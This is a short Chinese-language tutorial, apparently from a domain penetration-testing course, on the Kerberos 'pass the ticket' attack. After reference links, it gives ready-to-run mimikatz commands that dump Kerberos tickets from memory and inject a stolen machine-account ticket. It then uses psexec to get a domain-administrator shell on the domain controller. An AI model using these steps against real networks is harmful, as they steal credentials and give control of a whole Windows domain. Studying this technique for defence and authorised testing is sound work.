参考资料

• 乌云文章：《域渗透——Pass The Hash & Pass The Key》、《域渗透——Pass The Ticket》、《从活动目录获取域管理员权限的各种姿势》
• https://medium.com/@t0pazg3m/pass-the-ticket-ptt-attack-in-mimikatz-and-a-gotcha-96a5805e257a
• https://resources.infosecinstitute.com/pass-hash-pass-ticket-no-pain/#gref

录制的视频教程

• 域渗透实践篇（四）

1. pass the ticket

ptt票据传递实践

pass the hash: 一把钥匙开所有的门锁

pass the ticket: 进入房间后，找到备用钥匙（高权限票据），以备用钥匙来开门。有效时间10小时，过期后可以重新导入内存。域内普通用户获得域管理员权限。

dir \OWA2010SP3\C$

privilege::debug
sekurlsa::tickets /export		  #导出内存中的票据
kerberos::purge
以上命令可以写成下面的形式

mimikatz.exe "privilege::debug" "sekurlsa::tickets /export" exit

mimikatz.exe "privilege::debug"  "kerberos::ptt [0;3e4]-2-1-40e00000-SRV-DB-0DAY$@krbtgt-0DAY.ORG" exit

获取到域管理员权限之后

net time /domain 		#查域控的主机名
psexec.exe \\OWA2010SP3 cmd.exe  		#使用域控主机名，获得域管理员权限的cmd shell